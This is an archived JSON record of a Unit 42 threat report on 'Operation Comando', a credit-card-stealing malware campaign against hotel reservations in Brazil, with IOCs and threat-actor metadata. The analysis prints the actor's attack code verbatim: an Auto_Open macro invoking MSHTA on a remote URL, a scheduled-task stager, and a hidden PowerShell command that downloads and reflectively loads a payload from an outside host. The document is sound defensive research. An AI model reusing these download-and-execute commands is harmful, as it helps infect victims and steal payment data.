{
	"id": "a43d2ac7-baea-44fe-910d-d91316caa16e",
	"created_at": "2026-04-06T00:21:10.67703Z",
	"updated_at": "2026-04-10T03:35:56.566188Z",
	"deleted_at": null,
	"sha1_hash": "93579e1cdc4b3e3bcbe7809cd550a1c9f6f23251",
	"title": "Operation Comando: How to Run a Cheap and Effective Credit Card Business",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1178214,
	"plain_text": "Operation Comando: How to Run a Cheap and Effective Credit\r\nCard Business\r\nBy Unit 42\r\nPublished: 2019-03-12 · Archived: 2026-04-05 15:18:46 UTC\r\nIn December 2018, Palo Alto Networks Unit 42 researchers identified an ongoing campaign with a strong focus\r\non the hospitality sector, specifically on hotel reservations. Although our initial analysis didn’t show any novel or\r\nadvanced techniques, we did observe strong persistence during the campaign that triggered our curiosity.\r\nWe followed network traces and pivoted on the information left behind by this actor, such as open directories,\r\ndocument metadata, and binary peculiarities, which enabled us to find a custom-made piece of malware that we\r\nnamed “CapturaTela”. Our discovery of this malware family shows the reason for the persistent focus on hotel\r\nreservations as a primary vector: stealing credit card information from customers.\r\nProfiling this threat actor uncovered not only their delivery mechanisms, but also their arsenal of remote access\r\ntools and info-stealing trojans, acquired both from underground forums and from open source tools found in\r\nGitHub repositories.\r\nHave you ever wondered how an actor can run a very cheap and effective credit card data underground business?\r\nWelcome to “Operation Comando”.\r\nThe attacker’s delivery mechanisms\r\nOur telemetry for this campaign identified email as the primary delivery mechanism and found that the first related\r\nsamples were distributed in August 2018. Email topics used by the actor typically relate to travel bookings and\r\nvouchers, and mainly target Brazilian victims. 
Table 1 shows a representative list of typical subjects and\r\nattachment names found during the campaign.\r\nEmail subject | Attachment names\r\nReserva para tres quartos | “Ficha cadastral Leticia Ferreira Mendes.ppam”, “Ficha cadastral Jacinto Mendes da Silva.ppam”, “Ficha cadastral Marcos Portela Correa.ppam”, “Ficha cadastral Francisco Prado.ppam”\r\nReserva Veirano Advogador | Roominglist Veirano Advogados .docx\r\nCorrigir data da reserva para o dia 03 | Booking - Dados da Reserva.docx\r\nVoucher para reserva | Voucher para reserva 02.docx\r\nReserva | Voucher de Reserva ADRIANA MILLER RODRIGUES.ppa\r\nTable 1 Some email subjects and attachment names representative of this campaign.\r\nhttps://unit42.paloaltonetworks.com/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business/\r\nPage 1 of 17\n\nWhile investigating the malicious documents used in the campaign, we discovered an interesting consistency in\r\nthe document metadata. The author consistently uses an acronym throughout their work: “C.D.T Original” (see\r\nFigure 1).\r\nFigure 1 Example of malicious document metadata\r\nThe attackers make use of multiple common off-the-shelf methods that are observed in many campaigns, such as\r\nexternal references to remote scripts executed by MSHTA. Using this approach, the actor can draw on many\r\ntools and resources to perform their activities while making attribution and tracking more difficult\r\nfor analysts. 
The most prevalent combinations of methods observed are depicted in Figure 2.\r\nFigure 2 Multiple delivery mechanisms.\r\nAs an example of an email delivery used during the December 2018 campaigns, let’s look at a document purporting to be a\r\nrooming list (SHA256: ac70d15106cc368c571c3969c456778b494d62c5319dc366b7e2c116834c6187), which\r\nfollows one path from Figure 2, more precisely the steps described in Figure 3.\r\nFigure 3 December 2018 campaign delivery example\r\nThe malicious documents contain a simple macro, which executes a remotely-hosted script using MSHTA:\r\nPublic Sub Auto_Open()\r\nvar0 = \"MSHTA https://bit[.]ly/2QXNTHi\"\r\nVar = var0\r\nShell (Var)\r\nEnd Sub\r\nThe landing URL resolves to:\r\nhxxps://internetexplorer200[.]blogspot[.]com/\r\nThe statistics for the URL-shortened link on bit.ly confirm the observations from our telemetry, showing targets\r\nmainly in Brazil, as depicted in Figure 4.\r\nFigure 4 Distribution of Bit.ly campaign on 27-28th December\r\nMSHTA executes VBScript contents that are encoded/obfuscated using a very simple algorithm (note the presence\r\nof Portuguese words throughout the code).\r\nFigure 5 First stage VBScript code run via MSHTA\r\nThis results in the following scheduled task being created on the system, where a new second-stage script is invoked via\r\nMSHTA from another remote location. 
Note that the second-stage VB code contains a reference to “CDT” in a\r\ncomment.\r\n\"set shhh = CreateObject(\\\"WScript.Shell\\\")\\r\\n   Dim var1\\r\\n var1 = \\\"cmd.exe /c SchTasks /Create /sc MINUTE\r\n/MO 240 /TN AdobeUpdateSD /TR \\\"\\\".exe https://minhacasaminhavidacdt.blogspot[.]com/\\\"\\r\\nshhh.run var1,\r\nvbHide\\r\\n\"\r\nFigure 6 Second-stage VB script\r\nThis second-stage VBScript code ends up loading a final payload in memory via PowerShell reflection, fetching\r\nthe binary content from a file with a GIF extension:\r\n\"CreateObject(\\\"Wscript.Shell\\\").run  \\\"cmd.exe /c powershell -ExecutionPolicy Bypass -windowstyle hidden -\r\nnoexit -command [Reflection.Assembly]::Load([Convert]::FromBase64String((New-Object\r\nNet.WebClient).DownloadString('http://achoteis.com[.]br/images/64.gif'))).EntryPoint.Invoke($null,$null)\\\"\\r\\n\"\r\nThe final payload delivered in this case is Revenge Remote Access Trojan (RAT), a commodity tool which can be\r\nused to facilitate information theft.\r\nInfrastructure analysis\r\nAt the infrastructure level, the attacker makes use of dynamic DNS (DDNS) services such as DuckDNS, WinCo,\r\nor No-IP, many of which offer free accounts, lowering the investment required for attacker infrastructure. Some\r\nexamples of the domains in use are detailed in Table 2.\r\nDynamic DNS domains\r\nsystenfailued.ddns[.]com[.]br\r\noffice365update[.]duckdns[.]org\r\ncdtoriginal[.]ddns[.]net\r\nTable 2 Examples of domains associated with this campaign using DDNS providers\r\nIn addition to using free services, paste sites, and compromised sites, we have also identified at least one domain\r\nthat appears to be actor-owned. 
The domain “fejalconstrucoes[.]com[.]br” has been used to host payloads, as well\r\nas to send emails to potential victims. Figure 7 shows the DNS WHOIS record for the domain, which was\r\nregistered using the UOL service in Brazil.\r\nFigure 7 DNS WHOIS record\r\nEmails with malicious attachments belonging to this campaign have been found with the following characteristics:\r\nDomain: fejalconstrucoes[.]com[.]br\r\nEmail senders: mmcorrea@fejalconstrucoes.com.br, marcos@fejalconstrucoes.com.br\r\nAttachment names: Contrato Anual FEJAL Construçoes.ppa\r\nAs mentioned before, an interesting detail in the domains and paths used by the attacker is the recurring\r\nacronym “CDT”, for example:\r\nhxxp://bit[.]ly/cdtqueda\r\nhxxp://cdtoriginal.ddns[.]net\r\nIdentifying the main business driver: “CapturaTela”\r\nDuring our investigation, an open directory we identified allowed us to retrieve several payloads used by the attacker.\r\nTable 3 displays the set of payloads and documents found. 
The acronym “CDT” keeps appearing even in the file\r\nnames used.\r\nFilename | SHA256\r\nCDT.hta | 4485a8f339171ca86f7e38b912f0f28072ffe04404d5062af3a60f322566f870\r\nCopia Detalhe da reserva - Booking.ppam | ac70d15106cc368c571c3969c456778b494d62c5319dc366b7e2c116834c6187\r\nDadosDaReserva.doc | 03483d2e701f8f90c9cc46b37f12f1cef995e4cca4b5c4b9e67947f560275677\r\nDillI.js | d5f4d7fb7c8042b047e9f3d93d5f02841f01889ba8a899c0c1ed7064129e3bb4\r\nquasar.jse | 03d7de252c30c87d6b156b4fbcdcd008ef6bae319a9c42613aaa01428bd490e3\r\nTable 3 Contents found in an open directory at cdtmaster[.]com[.]br\r\nDespite the filename, \"quasar.jse\" is not QuasarRAT, but instead a JS script which contains a basic base64\r\nencoded payload dropper (see Figure 8), with a very simple payload that proved interesting for our investigation.\r\nFigure 8 JS base64 payload dropper\r\nThe decoded payload is a PE file, written in .NET, with information-stealing capabilities. One of its main methods\r\ngives its name to our malware family, “CapturaTela”, and as its Portuguese name indicates, it has the capability to\r\nsave a screenshot into a Bitmap object.\r\nFigure 9 CapturaTela method's screen capture capabilities.\r\nThe main functionality of this malicious information-stealing trojan is the following (see Figure 10):\r\nIterate over the open processes list and check for specific window titles. The title has to contain either “ls . B” or “o . B” for the sample to perform further activity.\r\nIf the title is found, a screenshot will be taken and sent by email as a JPEG attachment (see Figure 12).\r\nIt will kill existing Chrome processes when done. 
The window titles are probably based on Chrome tab\r\ncontents.\r\nFigure 10 Main functionality loop of CapturaTela\r\nFigure 11 Email exfiltration capabilities of CapturaTela\r\nIn order to validate the functionality, we decided to create a simple web page matching the title content and\r\npatched the malicious sample to use a test email account under our control (see Figure 12).\r\nFigure 12 Test HTML page and debugging CapturaTela functionality\r\nAs a result, as displayed in Figure 13, we confirmed the format and contents of the exfiltrated information that the\r\nattacker was planning to collect from its victims.\r\nFigure 13 Email received with data exfiltrated\r\nSo the only remaining question for our investigation was what kind of content and window titles this\r\ninformation-stealing trojan was looking for. Which kind of web pages could contain “ls · B” or “o · B” as part of\r\ntheir title?\r\nInitially, finding a website with these properties seemed to be an impossible task, but we started the research based\r\non what we knew about the targets and the email delivery session metadata used in these campaigns. From this data,\r\nwe were able to identify potential target websites whose page titles contain certain terms, common to the industry\r\nand nature of the business, in both English and Portuguese, that would match the string\r\npattern described above and invoke the malware’s credit card stealing capabilities. 
The websites found\r\nled us to conclude that the attacker’s focus is on getting the victim’s full credit card details during a given purchase\r\nprocess.\r\nAfter analyzing several CapturaTela samples and extracting the contents of the email configuration portion,\r\nwe found several interesting strings, displayed in Table 4.\r\nInteresting strings\r\nComando30\r\nComando30@cdt\r\ncomando50\r\nTable 4 Interesting strings in email configurations\r\nThe continuous use of the “CDT” acronym, and the presence of the word “Comando”, which we could associate\r\nwith the first letter of the acronym, led us to choose “Operation Comando” to describe this campaign.\r\nExtensive use of Remote Access Trojans\r\nAside from the use of the custom trojan CapturaTela, the actor makes extensive use of several other remote access\r\ntrojans to perform its malicious activities. The following RAT families have been observed during the actor’s\r\ncampaigns.\r\nRAT family\r\nLimeRAT\r\nRevengeRAT\r\nNjRAT\r\nAsyncRAT\r\nNanoCoreRAT\r\nRemcosRAT\r\nTable 5 Top RAT families observed in this campaign\r\nThe extensive use of these RAT tools potentially broadens the actor’s business objectives, given the amount of\r\nadditional information the actor can obtain on top of the credit card purchase data stolen from target websites via infected\r\nvictims.\r\nSeveral of the RAT families used can be found on GitHub, such as:\r\nhttps://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp\r\nhttps://github.com/NYAN-x-CAT/Lime-RAT\r\nOverlaps with other published research\r\nSome of the domains and samples found in this investigation have already been researched and reported by Yoroi.\r\nBased on the details of our research, we strongly believe that despite some minor overlaps in the techniques\r\nused, this campaign is not related to Gorgon Group.\r\nConclusions\r\nOperation Comando is a 
pure cybercrime campaign, possibly of Brazilian origin, with a concrete and persistent\r\nfocus on the hospitality sector, which shows how a threat actor can successfully pursue its objectives while\r\nmaintaining a cheap budget. The use of DDNS services, publicly available remote access tools, and a\r\nminimum of software development knowledge (in this case VB.NET) have been enough to run a campaign\r\nlasting months and potentially gather credit card information and other data.\r\nWhile cybercrime campaigns like this remain active, Palo Alto Networks customers are protected from these\r\nthreats in the following ways:\r\nWildFire detects all malicious documents and payloads delivered as malware.\r\nAutoFocus customers can track this campaign using the following tag: OperationComando\r\nTraps blocks all of the files associated with this campaign.\r\nPalo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report\r\nwith our fellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections\r\nto their customers and to systematically disrupt malicious cyber actors. 
For more information on the Cyber Threat\r\nAlliance, visit cyberthreatalliance.org.\r\nIndicators of Compromise\r\nInfrastructure\r\nfejalconstrucoes[.]com[.]br\r\ninternetexplorer200[.]blogspot[.]com\r\noffice365update[.]duckdns[.]org\r\nolhomagicocdt[.]duckdns[.]org\r\n498408[.]ddns[.]net\r\nSystenfailued[.]ddns[.]com[.]br\r\ninternetexploter[.]duckdns[.]org\r\nssl9294[.]websiteseguro[.]com\r\nc-d-t[.]weebly[.]com\r\nMalicious documents\r\n55732ba1b1e94add5e75e90d5eba137bfbfbd35e537b8d5c9a01365f5a6407d7\r\n7f13f449c80cc003d369c6b6002fd4912788e014ce35e97b29ba168136c6ece6\r\n47c471da52aa808250357c4638078c9e13797bb6a8a8b169d4b33d95ff230e89\r\n0c85b2ebc7c5316b7878239daf6a611fc2d0a05966f541e83e19db96f41fd3aa\r\n62f82e636924980b622204368f586723feb82594ce256e2e65ac5307fd67d669\r\n1c637cf4276b589f1b2806a77310b90c214cd0b026e4ec69448887be331ba5b3\r\nd96eaf8f22ec5cb9edba6369f9980efc8b0f76bf35eaf92aa5cb5e03669ddd9f\r\n1df7ace77a7f146b1bbd5c881134083f886ea83017f4619a9e62a9743909cdd1\r\n03483d2e701f8f90c9cc46b37f12f1cef995e4cca4b5c4b9e67947f560275677\r\nac70d15106cc368c571c3969c456778b494d62c5319dc366b7e2c116834c6187\r\n796c02729c9cd5d37976ddae205226e6339b64859e9980d56cbfc5f461d00910\r\nd67e160ccc6ac2fb8cd330e9fd53389fb1f99fad680d27045e5291e9d23d9317\r\n7f41ae21f3ad37505e5b3d0551caeb85bc9e07571d7d98acd3489b5db8ba6741\r\n3f3718b7e50eee8b0b3e4a4da8c5a0302623b5800eb7bc0718036f77a6ec72c0\r\na44e08b7ebd6bf73a9eb1b5a483987a1f0e3fdfe12b05a7a8f4ec1febfcf959e\r\n4211e091dfb33523d675d273bdc109ddecf4ee1c1f5f29e8c82b9d0344dbb6a1\r\nfd8781f125ac1ee68afb8dba61e17373ebe57bfd18850a01d41caaddde4cffcb\r\n269eb444415489a7898af36f1ba105129655226c98753d87afec651219e158c7\r\nee9d3c90df5c01dc6e2079d1219be752542a452988c4a25f34b8ee22be799332\r\n41b57429b00383f2b5d60fb22283b5c14a94ab8619c527e7d749e64b56d31518\r\nce44559beb4a5d52d962ab9e375970ef1d8e9f22a0be8c971b0244ebca61b2f2\r\nccd23e44662953d0837ca12728854bfd61f5ea14293a1620c3b48ba8f435a432\r\n57f31ef70a8b8b39659659abd0f1c8974fe23d2cbd2194d097375b2667a5424b\r\nf534f9b1cc64f03c32d59acdf9d58653bb0076798805af12e6cd914cbbfcf5fa\r\n846a89bbcf6c907fd915699a232c1f9acae0756fdc12c590198bfe65b4c90f44\r\n4f2ce6883b7057bde6baed2607e4645e4745db9ebfb20872e425944ba8ec3425\r\n722a2d8d4c1fb1e5195df50b159cdce0b05333acbb3ec90d24310331d21d2514\r\ne54bfccc796a4f779d332e535f78a5b118dbcd8a8971e39ac059ee9f069a1203\r\n4f4ea063d5bd22f1c57cdcf89d40339ddd5d5741c1b1dabfe52a474d70be9d04\r\nCapturaTela\r\nc7f3673ca116f76b16a7e00d81553abb0df02e75d4ac8fb6d3af52d351d9b46a\r\n904a4799edf642e6e685a137c88691f08b51643e539bea8de9e4cdf8c6251c7f\r\na03bc280123541518845cc167b4e812bbe9682696af4eeac041385cc0a00f5c6\r\nRATs\r\n2b343e0b0aa8de557fa11c9918f1b93ab6e88d9bd11565c587852d4d17bcf5a8\r\n57d83d5928bb8926718e732a85dd69dffe6ff61ff7edd9b843a50959f2fd1256\r\n33195ec463ba9d627a0c177eca366bbefa34306170449a5c0ef7661319ba2b05\r\n7eaea64fdfdc4f35ffe3036ee03f54c4aace204533a9d157faafa4a23221980c\r\ne76772ae83e2c79ed4aa80b5b7f4b42c46cea45ed1d15bd004b0dc71bfc41945\r\n977d940de630fff225e4917927d47100b75b56444c4117a22aa34b1450dc2930\r\n8a700793012385a706ef277f043bb5bf8a5ef877e3ba1fac3b5601df7fb36a30\r\nc740fe0dbf5aebf5f34e392a9bff0d4a19bf20ff553bb734574c2593ddcbbfa1\r\n10a7ba12bebaa572eb6eb4bef6d1a5043c5403bf796626a478205b344c4dc8c2\r\n4aff04954efd6cb02b1ba18831a72d44b2346db94e944a9f96c652f5944834d0\r\nd735d39de62009d09d7125f71cd774b23b6ab4a51d1dbb3d49003a5657b3477f\r\n9ad38281585897b1d49632ad049c700814f72e20edc46bbc43ba510413ac6f92\r\n877453c0e614e732eb9ee378693cf92263d2373e09c8287e3a4a821ecee29764\r\nb82c7535e41cddade675587ddaac9cb63fdf1973968f10f3a2bc1ea5409a29c2\r\nec824085dac0d7e0d2e3953d241756a78635a32ad442b7909f0895fd62b08010\r\n5c073adb376b57c99faa9cf10114beda732b13d04b7ed45a32c23eb043ec608f\r\n8d1db84b71eb1f38f95c13c89a6adfbc64d7ca5c5a5165ae7919e0d1e6fadc45\r\nb278ccf189d51b085390a985526ff37455ebe249ca9da69f64e2376979c56e6b\r\ne99df30a89dee25f56c2f35b20de2206406934f2e6ab043e299482649dce2cb8\r\n8e738b2239bbca9f50eab5f3cf3cbe58138e3b2515221c67e7eb934e2d3c7486\r\nb904e2823144ca9ab3161c3e508a88dc35922340e4ff2858e06b40e638bfd359\r\n99b70d49377117000eaf367c037ed68c4898b0d8769f7bff88a438a9d82db214\r\n982e2abc769f579a8753e8b2f65e0b0bbfbbdbae14b88f0ed697b635a9f4e38f\r\n03cb44736cdd60318af8399047507b011b95fadd4784b1607b28ad4940a9a36e\r\ne9f42c7fbedf0054391c3a85b79a34b5be134b40a83961cc90d0e473380fde1c\r\n6c45909d6311f8d356ddc704b27bd975cb3336a7b6e172206165bff613f94a2a\r\n9025c9b8cfc57e7dda5e742f18d69b4c4477f9254d10c5df15b7a6ffcf7d5985\r\nae3cddb0f665d739ebf5342a968585a5d13d54068ef59a51e82e739d184c6b3b\r\nd5baf4a27994ef2110bcc3a0b3ff2cd3815bac36d271462d1a39f77063bae9a5\r\nb0593829ea59d267f511f2685aa8ecf31860e123e0928ca8bf3fc1e30b3c4953\r\n1c30a54a8ad30faff0a7b309d377127ed739ea80c510d7526bbb5cbe6ef5cfc9\r\n498fd1c4cb16f39974555d6e596fcea6c7da73f9f0f30f57fdc8177fc3feaa4e\r\n1c604e040c04be9fad3129d7bd9c69b7f8057050b2002605dde1f5e60817f89a\r\n5dfd79503b19b67052ec060d74e1f2a9a5ee34de74d578c5b4499468bad8f1cb\r\nbc4c98116fadbcef2abfd0fe62a15b154a3b8a8eb329a877d64edc59260519c4\r\n9c794069b4d6346f8152b938e4f846af63d1f1015c935579d99af1c434789406\r\n7923c59d1405deacaceb26722db97714cf955610e02bf6d28051505331603606\r\na03bc280123541518845cc167b4e812bbe9682696af4eeac041385cc0a00f5c6\r\nc7f3673ca116f76b16a7e00d81553abb0df02e75d4ac8fb6d3af52d351d9b46a\r\n824d080a4da2275951a28285b66faac1698205dff181fe5fa1cf172ac1a17d8f\r\n0b04028774f0e166dcbe0f993b72c430dc15364e9cc52c221bdadcc9833816f2\r\n22e9260c6a4af1d42c353c7004cb2f5f245cea5e22572b111fcef4318c17e567\r\n904a4799edf642e6e685a137c88691f08b51643e539bea8de9e4cdf8c6251c7f\r\n7a9e3038d498d5ecaed19f6a80d9b0b7d73d47e669be8d61ca32d87566d7a035\r\n16ea765b2c51eadc61c6501b4ba96073a7d50f8cd7898285ffad49ba14a121dd\r\n18199bb3ad69901ef0040aa7445d6f0c8571a19cdade3115ffc9c142c0b5b721\r\nb940dc214f6a0be58e93f07aafcbc5a7518544f745413360269949664909fecd\r\n2d26bc42a499c4658523193ade85df13ab397d375fa593a757c54a6f1c71f221\r\n94a38857ebeed7d10480fb91a391a891d5a11137fabb8fc67b71c989b5e328e6\r\n116da8803ac9b2dd7e1149567f227d552e84db86dd7a33ad69e15b560f0fa177\r\n2945e6424f51e6077620a867e0f9c725b9b816164366912289ab6c24fdfcb9e6\r\n88d1a891cfdf09b7e1882582a82c3218d5606ed530764d34ee1410198ca9ee8b\r\n96424d66b7423dc54b35e4968a809a8b67d1dd8e7d8d3b0d84434edb94c822c5\r\n3158906cf7cb3186654bbb62d087b9a150c12c51d2ad67dd9003abeb0f69626a\r\n4e62dcea72cf73481dd8dae2bbeb8e1352a5f2510f3deb98ec0b653a4d21f8d8\r\n5370711dd45b84b9644b635d03baad08d75ff740364e93ed023adc9c4a297c43\r\n02254a03f08055399806b6457ee5e4fe6cfc47c6f75254434a14332d4c43afe5\r\nbf07b4ba117eb7d0ac59cbdd775e6a509c06a462b709b4f2d10979c9e5b3cf85\r\nSource: https://unit42.paloaltonetworks.com/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY",
		"ETDA"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business/"
	],
	"report_names": [
		"operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business"
	],
	"threat_actors": [
		{
			"id": "414d7c65-5872-4e56-8a7d-49a2aeef1632",
			"created_at": "2025-08-07T02:03:24.7983Z",
			"updated_at": "2026-04-10T02:00:03.76109Z",
			"deleted_at": null,
			"main_name": "COPPER FIELDSTONE",
			"aliases": [
				"APT36 ",
				"Earth Karkaddan ",
				"Gorgon Group ",
				"Green Havildar ",
				"Mythic Leopard ",
				"Operation C-Major ",
				"Operation Transparent Tribe ",
				"Pasty Draco ",
				"ProjectM ",
				"Storm-0156 "
			],
			"source_name": "Secureworks:COPPER FIELDSTONE",
			"tools": [
				"CapraRAT",
				"Crimson RAT",
				"DarkComet",
				"ElizaRAT",
				"LuminosityLink",
				"ObliqueRAT",
				"Peppy",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "e819f7c1-855b-4834-b30c-493832336ddb",
			"created_at": "2022-10-25T16:07:23.939418Z",
			"updated_at": "2026-04-10T02:00:04.796807Z",
			"deleted_at": null,
			"main_name": "Operation Comando",
			"aliases": [],
			"source_name": "ETDA:Operation Comando",
			"tools": [
				"AsyncRAT",
				"Atros2.CKPN",
				"Bladabindi",
				"CapturaTela",
				"Jorik",
				"LimeRAT",
				"Nancrat",
				"NanoCore",
				"NanoCore RAT",
				"Remcos",
				"RemcosRAT",
				"Remvio",
				"Revenge RAT",
				"RevengeRAT",
				"Revetrat",
				"Socmer",
				"Zurten",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "18278778-fa63-4a9a-8988-4d266b8c5c1a",
			"created_at": "2023-01-06T13:46:38.769816Z",
			"updated_at": "2026-04-10T02:00:03.094179Z",
			"deleted_at": null,
			"main_name": "The Gorgon Group",
			"aliases": [
				"Gorgon Group",
				"Subaat",
				"ATK92",
				"G0078",
				"Pasty Gemini"
			],
			"source_name": "MISPGALAXY:The Gorgon Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "97fdaf9f-cae1-4ccc-abe2-76e5cbc0febd",
			"created_at": "2022-10-25T15:50:23.296989Z",
			"updated_at": "2026-04-10T02:00:05.347085Z",
			"deleted_at": null,
			"main_name": "Gorgon Group",
			"aliases": [
				"Gorgon Group"
			],
			"source_name": "MITRE:Gorgon Group",
			"tools": [
				"NanoCore",
				"QuasarRAT",
				"Remcos",
				"njRAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "e1e83b71-854a-4ddf-82ed-141c1d151c3c",
			"created_at": "2023-01-06T13:46:38.934536Z",
			"updated_at": "2026-04-10T02:00:03.150803Z",
			"deleted_at": null,
			"main_name": "Operation Comando",
			"aliases": [],
			"source_name": "MISPGALAXY:Operation Comando",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6c4e4b91-1f98-49e2-90e6-435cea8d3d53",
			"created_at": "2022-10-25T16:07:23.693797Z",
			"updated_at": "2026-04-10T02:00:04.711987Z",
			"deleted_at": null,
			"main_name": "Gorgon Group",
			"aliases": [
				"ATK 92",
				"G0078",
				"Pasty Draco",
				"Subaat",
				"TAG-CR5"
			],
			"source_name": "ETDA:Gorgon Group",
			"tools": [
				"AgenTesla",
				"Agent Tesla",
				"AgentTesla",
				"Atros2.CKPN",
				"Bladabindi",
				"CinaRAT",
				"Crimson RAT",
				"ForeIT",
				"Jorik",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Loki",
				"Loki.Rat",
				"LokiBot",
				"LokiPWS",
				"MSIL",
				"MSIL/Crimson",
				"Nancrat",
				"NanoCore",
				"NanoCore RAT",
				"Negasteal",
				"NetWeird",
				"NetWire",
				"NetWire RAT",
				"NetWire RC",
				"NetWired RC",
				"Origin Logger",
				"Quasar RAT",
				"QuasarRAT",
				"Recam",
				"Remcos",
				"RemcosRAT",
				"Remvio",
				"Revenge RAT",
				"RevengeRAT",
				"Revetrat",
				"SEEDOOR",
				"Scarimson",
				"Socmer",
				"Yggdrasil",
				"ZPAQ",
				"Zurten",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434870,
	"ts_updated_at": 1775792156,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/93579e1cdc4b3e3bcbe7809cd550a1c9f6f23251.pdf",
		"text": "https://archive.orkl.eu/93579e1cdc4b3e3bcbe7809cd550a1c9f6f23251.txt",
		"img": "https://archive.orkl.eu/93579e1cdc4b3e3bcbe7809cd550a1c9f6f23251.jpg"
	}
}